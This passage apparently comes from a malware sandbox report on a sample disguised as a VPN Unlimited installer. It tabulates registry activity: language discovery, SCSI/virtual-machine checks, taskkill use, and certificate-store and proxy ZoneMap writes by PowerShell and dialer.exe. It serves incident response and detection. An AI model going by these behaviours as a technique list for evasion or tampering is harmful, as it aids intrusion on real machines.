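Run against the full report, the function output is the short list a responder actually needs: which dropped images injected into which Windows binaries (and with which PIDs, for cross-referencing the process tree and network tables), which writes into System32 came from something other than the installer, and whether the Netsh Helper DLL signature reflects a persistence write or only netsh.exe's normal startup reads, as it does here.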
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272 | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d3755855d3e98e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d3755850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d375585000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d375585000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d37558500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-20\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\dialer.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
